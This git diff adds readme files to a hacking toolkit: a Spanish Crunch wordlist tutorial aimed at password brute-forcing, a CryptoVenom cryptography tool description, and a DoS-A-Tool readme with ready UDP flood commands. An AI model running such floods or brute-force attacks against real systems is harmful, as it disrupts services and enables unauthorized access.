+1,722 @@ +Saludos mis futuros hackers + +En el mundo del hacking tenemos una técnica llamada fuerza bruta, bien vista por algunos y mal vista por otros, pero no es este el lugar de debatir sobre la calidad de la técnica, pues según wikipedia la fuerza bruta es: + +"La forma de recuperar una clave probando todas las combinaciones posibles hasta encontrar aquella que permite el acceso." + +Muy bien, para orquestar este tipo de ataque necesitaremos un archivo que contenga dentro de si, cientos, miles e incluso millones de palabras para ir probando 1 por 1 hasta dar con el valido, estos archivos en buen español se llaman diccionarios y los gringos para que nadie se confunda les dicen wordlists (listas de palabras). + +Ahora quiero que se imaginen que tengamos que crear un diccionario escribiendo todas las posibles palabras 1 por 1, no tendría sentido y tampoco sería práctico, así que existen programas que generan diccionarios automáticamente simplemente especificando algunos parámetros de entrada, entre esos programas podrían decirse que el más conocido es Crunch, una aplicación sin interfaz gráfica que tiene una gran flexibilidad al momento de generar diccionarios/wordlists, existe mucha documentación sobre el mismo, pero generalmente se explican 1 ó 2 ejemplos sobre su uso, dejando al usuario descubrir el resto, pues aqui en fb.me/Ivam3byCinderella les vamos a regalar un manual completo con todas las opciones y usos prácticos para que no quede duda alguna, esto sera algo asi como un curso intensivo de Crunch, asi que como el conocimiento es libre vamos a compartirlo. + + +QUE ES CRUNCH + +Crunch es un programa que basandose en criterios establecidos por el usuario (input) es capaz de generar diccionarios para ser usados en fuerza bruta (output), el resultado de Crunch puede ser visto en pantalla, puede ser guardado en un archivo .txt ó puede enviarse a otro programa en tiempo real para su uso. + +La version 1.0 fue creada por mima_yin y todas las versiones posteriores fueron actualizadas y desarrolladas por bofh28. A ellos todo el agradecimiento y el respeto por tan maravillosa herramienta. + + +COMO INSTALAR CRUNCH + +LINUX + +Pues en cualquier distro Linux bastaria con tirar de la terminal y escribir: + +$sudo apt-get install crunch + +Dependiendo de la distribución podríamos tener uno que otro gestor de paquetes, así que cada cual podría modificar el comando de acuerdo a sus sistemas (yum, pacman, aptitude, etc..) + +Imaginando que no este en los repositorios de software podriamos bajarnos el tarball e instalar nosotros mismos: + +$git clone http://git.code.sf.net/p/crunch-wordlist/code crunch-wordlist-code +$cd crunch-wordlist-code; +$sudo make && sudo make install; + +Termux + +Pues el creador no ha liberado una version oficial para los usuarios de Termux, pero venga que aqui llega la magia del software open-source, y es que un usuario, mejor dicho una usuaria (maripuri) ha compilado la version 3.2 de crunch para Android, asi que a ella muchas gracias por su esfuerzo y trabajo, y yo Ivam3 se los pongo a disposición de los interesados así que pueden bajarse el fichero desde aqui: + +LINK ---- https://github.com/ivam3/crunch-4tmux + +Primero clonaremos el repositorio. +Ejemplo: $git clone https://github.com/ivam3/crunch-4tmux + +Despues entramos a la carpeta clonada. +Ejemplo: $cd crunch-4tmux + +Posteriormente le damos los permisos requeridos al archivo ejecutable. +Ejemplo: $chmod 777 crunch + +Y por último copiamos el archio crunch a nuestra carpeta de binarios. +Ejemplo: $cp crunch /data/data/com.termux/files/usr/bin + +LISTO!! ya puedes ejecutar crunch desde cualquier ubicacin que te encuentres. + + + +COMO USAR CRUNCH NIVEL 1 + +Muy bien mis futuros hackers ha llegado el momento de la verdad, ha llegado el momento de desnudar esta maravillosa herramienta y poder hacer uso de ella de una forma eficiente, a continuacion veremos su uso, desde la ejecución mas sencilla hasta la más compleja. + +Bastaria con escribir "crunch" en una terminal para desplegar su menú de ayuda; donde podemos ver claramente la forma sencilla en que podemos hacer uso de ella: + +$crunch + +crunch version 3.6 + +Crunch can create a wordlist based on criteria you specify. The outout from crunch can be sent to the screen, file, or to another program. + +Usage: crunch [options] +where min and max are numbers + +Please refer to the man page for instructions and examples on how to use crunch. + +where min and max are numbers + +Es tan sencillo como decirle la cantidad de caracteres que estamos buscando seguido de alguna opcion, vamos a lanzarlo de una forma basica a ver que tal, probemos con generar todas las posibles combinaciones para una palabra de 4 caracteres: + +$crunch 4 4 + +Como se aprecia crunch avisa de una froma muy educada cuantas lineas seran generadas y cuanto espacio ocupara, a continuacion les comparto las primeras lineas de la salida en pantalla: + +aaaa +aaab +aaac +aaad +aaae +aaaf +aaag +aaah +aaai +aaaj +aaak +aaal +aaam +aaan +aaao +aaap +aaaq +aaar +aaas +aaat +aaau +aaav +aaaw +aaax +aaay +aaaz +aaba +aabb +aabc +aabd +aabe +aabf +aabg +aabh +aabi +aabj +aabk +aabl +aabm +aabn +aabo +aabp +aabq +aabr +aabs +aabt +aabu +aabv +aabw +aabx + +Vamos a analizar esto unos segundos... + +Tenemos que crunch ha generado todas las posibles combinaciones para una palabra de 4 caracteres, pero notan alguna particularidad? + +No se han usado números, símbolos, mayúsculas ni espacios en blanco. La razón se explica a continuación: + +Crunch utiliza una variable llamada charset (character setting) y es como el conjunto de caracteres que serán usados para la generación del diccionario/wordlist, por defecto el charset es lalpha (lower alphabet) pero que tal si probamos a configurar otro charset. + +$crunch 4 4 -f .charset.lst numeric + +Como siempre, al presionar enter crunch nos indicara cuantas lineas y cuanto espacio sera usado, analicemos las primeras lineas: + +0000 +0001 +0002 +0003 +0004 +0005 +0006 +0007 +0008 +0009 +0010 +0011 +0012 +0013 +0014 +0015 +0016 +0017 +0018 +0019 +0020 +0021 +0022 +0023 +0024 +0025 +0026 +0027 +0028 +0029 +0030 +0031 +0032 +0033 +0034 +0035 +0036 +0037 +0038 +0039 +0040 +0041 +0042 +0043 +0044 +0045 +0046 +0047 +0048 +0049 + +Todo ha ido bien, pero ahora notamos una pequeña diferencia, y es que solo ha generado números, pero eso es justo lo que queríamos no? Y como lo hemos logrado pues con la opción -f y listo!!  + +Esta opción le indica dónde buscar el fichero de variables, es decir, donde están preestablecidas todos los charset, es decir que debemos especificar la ruta al archivo así como nuestra selección dentro del mismo, en mi caso tengo el charset.lst en mi directorio home, por ello no específico ruta hasta el mismo.  + +Cuantos charset podemos elegir además de lalpha y de numeric? + +Miren por ustedes mismo + +hex-lower                     = [0123456789abcdef] +hex-upper                     = [0123456789ABCDEF] + +numeric                       = [0123456789] +numeric-space                 = [0123456789 ] + +symbols14                     = [!@#$%^&*()-_+=] +symbols14-space               = [!@#$%^&*()-_+= ] + +symbols-all                   = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] +symbols-all-space             = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +ualpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ] +ualpha-space                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ] +ualpha-numeric                = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] +ualpha-numeric-space          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ] +ualpha-numeric-symbol14       = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=] +ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ] +ualpha-numeric-all            = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] +ualpha-numeric-all-space      = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +lalpha                        = [abcdefghijklmnopqrstuvwxyz] +lalpha-space                  = [abcdefghijklmnopqrstuvwxyz ] +lalpha-numeric                = [abcdefghijklmnopqrstuvwxyz0123456789] +lalpha-numeric-space          = [abcdefghijklmnopqrstuvwxyz0123456789 ] +lalpha-numeric-symbol14       = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=] +lalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ] +lalpha-numeric-all        = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] +lalpha-numeric-all-space      = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +mixalpha                   = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ] + +mixalpha-space             = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ] + +mixalpha-numeric           = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] + +mixalpha-numeric-space     = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ] + +mixalpha-numeric-symbol14  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=] + +mixalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ] + +mixalpha-numeric-all       = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] + +mixalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +######################## +# Higercase             # +######################### +ualpha-sv                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ] + +ualpha-space-sv                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ ] + +ualpha-numeric-sv                = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789] + +ualpha-numeric-space-sv          = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789 ] + +ualpha-numeric-symbol14-sv       = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=] + +ualpha-numeric-symbol14-space-sv = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+= ] + +ualpha-numeric-all-sv            = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] + +ualpha-numeric-all-space-sv      = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +######################### +# Lowercase             # +######################### +lalpha-sv                        = [abcdefghijklmnopqrstuvwxyzåäö] + +lalpha-space-sv                  = [abcdefghijklmnopqrstuvwxyzåäö ] + +lalpha-numeric-sv                = [abcdefghijklmnopqrstuvwxyzåäö0123456789] + +lalpha-numeric-space-sv          = [abcdefghijklmnopqrstuvwxyzåäö0123456789 ] + +lalpha-numeric-symbol14-sv       = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=] + +lalpha-numeric-symbol14-space-sv = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+= ] + +lalpha-numeric-all-sv            = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] + +lalpha-numeric-all-space-sv      = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +######################### +# Mixcase               # +######################### +mixalpha-sv                   = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ] + +mixalpha-space-sv             = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ ] + +mixalpha-numeric-sv           = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789] + +mixalpha-numeric-space-sv     = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789 ] + +mixalpha-numeric-symbol14-sv  = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=] + +mixalpha-numeric-symbol14-space-sv = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+= ] + +mixalpha-numeric-all-sv       = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] + +mixalpha-numeric-all-space-sv = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + + +Si no quieren especificar ningun charset pueden simplemente pasarle a crunch cuales caracteres desean usar en la generacion, por ejemplo: + +$crunch 4 4 ab12 + +Y la salida seria: + +aaaa +aaab +aaa1 +aaa2 +aaba +aabb +aab1 +aab2 +aa1a +aa1b +aa11 +aa12 +aa2a +aa2b +aa21 +aa22 +abaa +abab +aba1 +aba2 +abba +abbb +abb1 +abb2 +ab1a +ab1b +ab11 +ab12 +ab2a +ab2b +ab21 +ab22 +a1aa +a1ab +a1a1 +a1a2 +a1ba +a1bb +a1b1 +a1b2 +a11a +a11b +a111 +a112 +a12a +a12b +a121 +a122 +a2aa +a2ab +a2a1 +a2a2 +a2ba +a2bb +a2b1 +a2b2 +a21a +a21b +a211 +a212 +a22a +a22b +a221 +a222 +baaa +baab +baa1 +baa2 +baba + +Empiezan a entender el sentido de la palabra "Flexibilidad" para referirse a crunch, bueno sigamos adelante aprendiendo más trucos para esta maravillosa tool. + + +CÓMO USAR CRUNCH NIVEL 2 + +Hasta ahora hemos aprendido a usar crunch al nivel basico, es decir solo sabemos generar diccionarios especificandole el tamaño y el conjunto de caracteres a usarse, y muchos pensaran que esa es toda la magia de generar diccionarios y la verdad es que esta cortos, siganme y veremos que otras cosas podemos hacer. + +Recuerdan aquella película de hackers en la que el estelar mira el teclado del administrador de sistemas y logra ver la clave digitada en el teclado? Pues en la vida real quizás no sea tan sencillo ver toda la clave digitada y solo logramos recordar parte de la misma y quizás su tamaño (si su tamaño, yo suelo contar las pulsaciones en el teclado asi me hago una idea del tamaño) pues supongamos que queremos generar una clave que inicia con "Und......" pero no sabemos el resto, pues podríamos decirle a crunch: + +$crunch 9 9 -t und@@@@@@ + +Y esto generara: + +undaaoerv +undaaoerw +undaaoerx +undaaoery +undaaoerz +undaaoesa +undaaoesb +undaaoesc +undaaoesd +undaaoese +undaaoesf +undaaoesg +undaaoesh +undaaoesi +undaaoesj +undaaoesk +undaaoesl +undaaoesm +undaaoesn +undaaoeso +undaaoesp +undaaoesq +undaaoesr +undaaoess +undaaoest +undaaoesu +undaaoesv +undaaoesw +undaaoesx +undaaoesy +undaaoesz +undaaoeta +undaaoetb +undaaoetc +undaaoetd +undaaoete +undaaoetf +undaaoetg +undaaoeth +undaaoeti +undaaoetj +undaaoetk +undaaoetl +undaaoetm +undaaoetn +undaaoeto +undaaoetp +undaaoetq +undaaoetr +undaaoets +undaaoett +undaaoetu +undaaoetv +undaaoetw +undaaoetx +undaaoety +undaaoetz +undaaoeua +undaaoeub +undaaoeuc +undaaoeud +undaaoeue +undaaoeuf +undaaoeug +undaaoeuh +undaaoeui +undaaoeuj +undaaoeuk +undaaoeul +undaaoeum +undaaoeun +undaaoeuo +undaaoeup +undaaoeuq +undaaoeur +undaaoeus +undaaoeut +undaaoeuu +undaaoeuv +undaaoeuw +undaaoeux +undaaoeuy +undaaoeuz +undaaoeva +undaaoevb +undaaoevc +undaaoevd +undaaoeve +undaaoevf +undaaoevg +undaaoevh + +Y si nos fijamos crunh ha generado palabras sin modificar los 3 primeros caracteres, con lo cual si la palabra clave es "undercode" eventualmente sera generada, pero que pasaria si el admin del sitio ha querido complicarla y ha puesto "underc0de" como password? pues podemos hacerlo de dos formas, una sencilla y otra un poco mas compleja, para la forma compleja podriamos hacerlo al especificar un charset alfanumerico escribiendo: + +$crunch 9 9 -f .charset.lst lalpha-numeric -t und@@@@@@ + +ó bien podriamos especificar los caracteres que queremos usar: + +$crunch 9 9 abcefghijklmnopqrstuwxyz1234567890 -t und@@@@@@ + +Con ambos comandos tendriamos el mismo resultado, simplemente son dos formas de hacer lo mismo + +undaaaz1u +undaaaz1v +undaaaz1w +undaaaz1x +undaaaz1y +undaaaz1z +undaaaz10 +undaaaz11 +undaaaz12 +undaaaz13 +undaaaz14 +undaaaz15 +undaaaz16 +undaaaz17 +undaaaz18 +undaaaz19 +undaaaz2a +undaaaz2b +undaaaz2c +undaaaz2d +undaaaz2e +undaaaz2f +undaaaz2g +undaaaz2h +undaaaz2i +undaaaz2j +undaaaz2k +undaaaz2l +undaaaz2m +undaaaz2n +undaaaz2o +undaaaz2p +undaaaz2q +undaaaz2r +undaaaz2s +undaaaz2t +undaaaz2u +undaaaz2v +undaaaz2w +undaaaz2x +undaaaz2y +undaaaz2z +undaaaz20 +undaaaz21 +undaaaz22 +undaaaz23 +undaaaz24 +undaaaz25 +undaaaz26 +undaaaz27 +undaaaz28 +undaaaz29 +undaaaz3a +undaaaz3b +undaaaz3c +undaaaz3d +undaaaz3e +undaaaz3f +undaaaz3g +undaaaz3h +undaaaz3i +undaaaz3j +undaaaz3k +undaaaz3l +undaaaz3m +undaaaz3n +undaaaz3o +undaaaz3p +undaaaz3q +undaaaz3r +undaaaz3s +undaaaz3t +undaaaz3u +undaaaz3v +undaaaz3w +undaaaz3x +undaaaz3y +undaaaz3z +undaaaz30 +undaaaz31 +undaaaz32 +undaaaz33 +undaaaz34 +undaaaz35 +undaaaz36 +undaaaz37 +undaaaz38 +undaaaz39 +undaaaz4a +undaaaz4b +undaaaz4c +undaaaz4d +undaaaz4e +undaaaz4f +undaaaz4g +undaaaz4h +undaaaz4i +undaaaz4j +undaaaz4k +undaaaz4l +undaaaz4m +undaaaz4n +undaaaz4o +undaaaz4p +undaaaz4q +undaaaz4r +undaaaz4s +undaaaz4t +undaaaz4u +undaaaz4v +und..... + +Ahora viene la forma sencilla que es simplemente cambiar el símbolo "@" por el tipo de carácter que queremos insertar en la generación del diccionario, recuerden que con la opción -t, podemos especificar un patrón de caracteres que serán los únicos en cambiar al generar el diccionario, así los caracteres que podemos especificar para el patrón son: + +              @  insertara minúsculas +              ,    insertara mayúsculas +              %  insertara números +              ^   insertara símbolos + +Sabiendo esto vamos a suponer que queremos generar un diccionario donde la primera letra sea en mayúscula, pero que a lo largo del mismo, tanto el 2do como el 3er caracter se queden fijos, pues para hacerlo agregamos una "," que tal como explique anteriormente insertará mayúsculas, pero recordemos que había un número en el password, asi que tambien necesitamos insertar un solo número en el 7mo carácter de nuestra palabra, pues sólo contamos hasta el lugar número 7 e insertamos un "%" que como también expliqué anteriormente solo inserta números, el comando final quedaría como esto:  + +$crunch 9 9 -t ,nd@@@%@@ + +generando lo siguiente : + +Andaaw2fn +Andaaw2fo +Andaaw2fp +Andaaw2fq +Andaaw2fr +Andaaw2fs +Andaaw2ft +Andaaw2fu +Andaaw2fv +Andaaw2fw +Andaaw2fx +Andaaw2fy +Andaaw2fz +Andaaw2ga +Andaaw2gb +Andaaw2gc +Andaaw2gd +Andaaw2ge +Andaaw2gf +Andaaw2gg +Andaaw2gh +Andas.... + +Todo esta flexibilidad la hemos logrado con la opción -t, espero la hayan entendido y les sea muy práctica en un futuro. + +Veamos, vamos a generar un diccionario concatenando palabras, a imaginarse por cual razón algunas personas usan como password una serie de palabras unidas, por ejemplo alguien que le guste harry potter podría usar los nombres de Harry, Hermione y Ron como password y en ese caso generar simplemente por caracteres sería casi imposible dada la longitud final "harryhermioneron" así que en crunch existe una opción que nos permite concatenar palabras, veamos como: + +$crunch 1 1 -p Harry Hermione Ron + +generando esto: + +HarryHermioneRon +HarryRonHermione +HermioneHarryRon +HermioneRonHarry +RonHarryHermione +RonHermioneHarry + +Como se habran fijado con la opcio -p es posible lograr concatenar palabras, pero hay una particularidad y es que fijense que en la parte donde se especifican la longitud menor y la mayor yo he colocado "1 1" y pues la verdad es que cuando se usa la opcion -p los numeros no son procesados, pero son necesarios para el argumento, es decir que podremos colocar cualquier cosa y sera irrelevante para la salida. + + +CÓMO USAR CRUNCH NINEL 3 + +Pues llegados a este punto ya sabemos generar diccionarios con distintos charset, sabemos aplicar patrones en la generación, concatenar palabras, así como especificar con cuales caracteres queremos generar, así que considero que estamos avanzando en la tarea de desnudar a crunch. + +Al inicio del taller decia que crunch puede mandar los resultados a la pantalla, puede crear un archivo ó pasarle la salida a otro programa (generalmente un crackeador como aircrack) pero hasta ahora solamente hemos sacado los resultados en pantalla, es decir no se han creado ningun archivo ni nada parecido, asi que vamos a ello. + +Enviando el output de crunch a un archivo.txt ó a un comprimido. + +Pues la idea basica de crear un diccionario es poder usarse posteriormente para dar con el hash valido en una prueba de fuerza bruta, asi que de alguna forma debemos poder generar un fichero a partir de la salida, esto es posible usando la opcion -o (output) seguido del nombre del archivo, tomemos como ejemplo el ejercicio de Harry Hermione y Ron y creemos un fichero, el comando seria: + +$crunch 1 1 -o NombresPotter.txt -p Harry Hermione Ron + +Opcionalmente tambien podriamos especificar la ruta donde queremos volcar el diccionario, por ejemplo: + +crunch 1 1 -o /sdcard/diccionarios/NombresPotter.txt -p Harry Hermione Ron + +Vamos a avanzar un poco más profundo y hagamos que cada 5000 líneas crunch nos genero 1 fichero, pues para que, dependiendo el entorno en el que se vaya a auditar necesitamos seccionar el ataque, es decir dividir el diccionario en una cantidad específica, para lograr mejor acoplamiento con los temporizadores de los crackeadores, para lograr esa división de un diccionario en varios ficheros de menor tamaño usamos la opción -c (esta opción solo funciona si el -o START está presente en la linea) por ejemplo: + +crunch 1 1 -o /sdcard/diccionarios/START -c 5000 + +Esto inicia el proceso de crear multiples ficheros con 5000 lineas cada uno. + +Y si me fuera a la carpeta diccionarios me encontraría con diversos archivos en extensión .txt los cuales tendrían un límite de líneas a 5000. + +Ven que sencillo? + +NOTA: + +[].- El START funciona como nombre de archivo para el primer fichero a crear, a partir de ahi los ficheros tomaran el nombre de la ultima linea del archivo anterior + la primera linea del archivo posterior + +[].- Aunque debo aclarar que en algunos caso es posible llenar el disco duro al generar un diccionario, todo depende de lo que le digamos a crunch, por ejemplo si yo dijese: + +$crunch 15 25 -o demasiado.txt +$crunch will now generate approximately the following amount of data: 2744 PB + +Se fijan en el tamaño del fichero? + +2744 PB !!! + +Eso seria demasiado para cualquier disco duro. + +Pero entre tanta generacion que tal si creamos un fichero y lo comprimimos a bzip, de un solo golpe, suena complicado pero seria simplemente agregar la opcion -z seguido del tipo de compresion deseado, por ejemplo: + +$crunch 4 5 -o /sdcard/diccionarios/START -c 5000 -z gzip + +De esta forma se iniciaria el mismo proceso anterior solo que en comprimidos gzip u en cualquier otro formato soportado por crunch (gzip, bzip2, lzma, y 7z ) + +Pues como podran ver no es tan complicado mandar la salida a un fichero txt, gzip, bzip2, lzma ó 7z. + +........ + +Espero le sea útil esta breve pero necesaria explicación. +Recuerden seguirme en: +Canal de YouTube --> www.youtube.com/Ivam3bycinderella +Canal de Telegram -> t.me/Ivam3byCinderella +Bot de Telegram --> t.me/Ivam3_Bot + +Saludos mis queridos futuros hackers, hasta la próxima. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cryptovenom.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cryptovenom.md new file mode 100755 index 00000000..47e375ea --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cryptovenom.md @@ -0,0 +1,219 @@ +# CryptoVenom +CryptoVenom: The Cryptography Swiss Army knife + +

+ +

+ +# What is CryptoVenom? + + +CryptoVenom is an OpenSource tool which contains a lot of cryptosystems and cryptoanalysis methods all in one, including +classical algorithms, hash algorithms, encoding algorithms, logic gates, mathematical functions, modern symmetric and asymmetric encryptions etc. + + +# What is the Purpose of CryptoVenom? + +Make easier the cryptoanalysis or the usage of cryptosystems and manipulation of them. + +If you are a CTF Player or just a curious student with just learning purposes this is your tool! + + +# Errors? Updates? + +As this is a very big tool, and I created it alone there might be some errors in it, if you get an error, +or some functionality of the tool is not working for you please contact as soon as possible with me through telegram (@LockedByte), email (alejandro.guerrero.rodriguez2@gmail.com) or just open it in gitHub. I'll patch all these errors quickly. + +# Dependencies? Setup? Installing? + +CryptoVenom is JUST working for linux, I tested it just in kali and in Parrot OS, if you are in another dist and you have problems let me know. Installing is a very simple process, just execute as root the setup.py file and dependencies will be installed. + + +# Content + +[+] Classical + + [*] Caesar + [*] Vigenere Cipher + [*] Playfair Cipher + [*] Polybius Square + [*] Morse + [*] Atbash + [*] Baconian + [*] AutoKey + [*] Beaufort Cipher + [*] Railfence Cipher + [*] Simple Substitution Cipher + [*] Columnar Tramposition + [*] Bifid + [*] Foursquare Cipher + [*] Fractionated Morse + [*] Enigma + [*] Gronsfeld Cipher + [*] Porta + [*] RunningKey + [*] ADFGVX Cipher + [*] ADFGX Cipher + [*] Affine Cipher + [*] Vernam Cipher + + +[+] Asymmetric + + [*] RSA + [*] Diffie-Hellman + [*] DSA + [*] ECC (Elliptic Curve Cryptography) + +[+] Symmetric + + [*] AES / Rijndael (Advanced Encryption Algorithm) + [*] DES (Data Encryption Standard) + [*] XOR Cipher + [*] Blowfish + [*] Twofish + [*] 3DES / TDES (Triple DES) + [*] RC2 (Ron's Code 2) + [*] RC4 (Ron's Code 4) + [*] CAST + [*] SCrypt + + +[+] Encoding + + [*] Base16 + [*] Base32 + [*] Base64 + [*] Base58 + [*] Base85 + [*] Base91 + [*] Hexadecimal + [*] Octal + [*] Decimal + [*] Binary + [*] ROT-x + [*] URL Encode/Decode + +[+] Hash + + [*] MD5 + [*] SHA-1 + [*] SHA-224 + [*] SHA-256 + [*] SHA-384 + [*] SHA-512 + [*] MD2 + [*] MD4 + [*] Argon2 + [*] BCrypt + [*] BigCrypt Unix + [*] Blake2b + [*] Blake2s + [*] BSDi Crypt Unix + [*] Cisco ASA Hash + [*] Cisco PIX Hash + [*] Cisco Type 7 + [*] Crypt-16 Unix + [*] DES Crypt Unix + [*] FreeBSD Unix + [*] HMAC + [*] LDAP-MD5 + [*] LDAP Salted MD5 + [*] LDAP SHA-1 + [*] LDAP Salted SHA-1 + [*] LMHash + [*] MD5 Unix + [*] MSDCC Hash + [*] MSDCC 2 Hash + [*] MSSQL 2000 Hash + [*] MSSQL 2005 Hash + [*] MySQL 41 Hash + [*] MySQL 323 Hash + [*] NTHash + [*] NTLM Hash + [*] Oracle 10 Hash + [*] Oracle 11 Hash + [*] PHPass Hash + [*] PostgreSQL MD5 + [*] RIPEMD + [*] SCrypt + [*] SHA-256 Unix + [*] SHA-512 Unix + [*] Sun MD5 Unix + + + +[+] String Manipulation + + [*] Reverse String + [*] Block Reverse String + [*] String To Upper + [*] String To Lower + [*] One-Byte List + [*] Reverse Case + [*] Remove Spaces + [*] Remove Enters + [*] String Replacement + [*] Add Line Numbers + + +[+] Mathematical Functions + + [*] Fast Exponentiation Algorithm + [*] Extended Euclidean Algorithm + [*] Fatorize Product of two primes + + + +[+] Other + + [*] XOR + [*] AND + [*] NAND + [*] NOT + [*] OR + [*] NOR + [*] XNOR + [*] PGP Operations + + +I'll add more ciphers, cracking systems and functionalities! + + +# Planning-to-add features + +- File Hashing +- Finish Crackssistant +- PGP Operations +- Algorithm Identifiers +- Elliptic Curve Cryptography (ECC) +- ElGamal +- Bruteforcers & crackers against Symmetric algorithms +- More crackers & bruteforcers against Classical Algorithms +- Calculate file entropy +- Key Exchanges with TCP Sockets +- More error handling and "try/excepts" +- More customizable options +- More encodings in hash bruteforcer +- Add HMAC-(hash) for each hash algorithm + +* Please: If you want anything to be added to the tool contact me and I'll add it to the next version! + +# About + +Created By Alejandro Guerrero Rodriguez (LockedByte) + +Twitter: @LockedByte +Telegram: @LockedByte +Email: alejandro.guerrero.rodriguez2@gmail.com + + + + + +Collaborator in testing and error patching purposes: + +Eduardo Perez Malumbres + +Twitter: @blueudp +Telegram: @blueudp diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md new file mode 100755 index 00000000..71c7bef7 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md @@ -0,0 +1,55 @@ +# DoS-A-Tool v.1.5 + + Denail of Service Attack Tool (DoS-A-Tool) + +A distributed denial-of-service (DDoS) attack is an attack in which multiple compromised computer systems attack a target, such as a server, website or other network resource, and cause a denial of service for users of the targeted resource. The flood of incoming messages, connection requests or malformed packets to the target system forces it to slow down or even crash and shut down, thereby denying service to legitimate users or systems. + +# INSTALLATION + $ yes|apt install git perl + + $ git clone https://github.com/ivam3/DoS-A-Tool.git + + $ cd DoS-A-Tool + + $ chmod 751 DoS-A-Tool + +# USAGE + +- For get a help menu : + + $ perl DoS-A-Tool --help + +- Start attack : + + $ perl DoS-A-Tool 0.0.0.0 + $ perl DoS-A-Tool 0.0.0.0 --port 1985 + $ perl DoS-A-Tool 0.0.0.0 --port 1985 --size 1000 --time 43200 + $ perl DoS-A-Tool 0.0.0.0 --port 1985 --time 43200 --bandwidth 25000 --delay 500 + +- Defaults: + * random destination UDP ports are used unless --port is specified. + * random-sized packets are sent unless --size or --bandwidth is specified. + * flood is continuous unless --time is specified. + * flood is sent at line speed unless --bandwidth or --delay is specified. + +- Usage guidelines: + * --size parameter is ignored if both the --bandwidth and the --delay + parameters are specified. + * Packet size is set to 256 bytes if the --bandwidth parameter is used. + without the --size parameter + * --time duration of the execution of the attack in seconds. + * --bandwidth specify the bandwidth to use in kbps. + * --delay interval in milliseconds(msec) between sending packets. + + * The specified packet size is the size of the IP datagram (including IP and + UDP headers). Interface packet sizes might vary due to layer-2 encapsulation. + 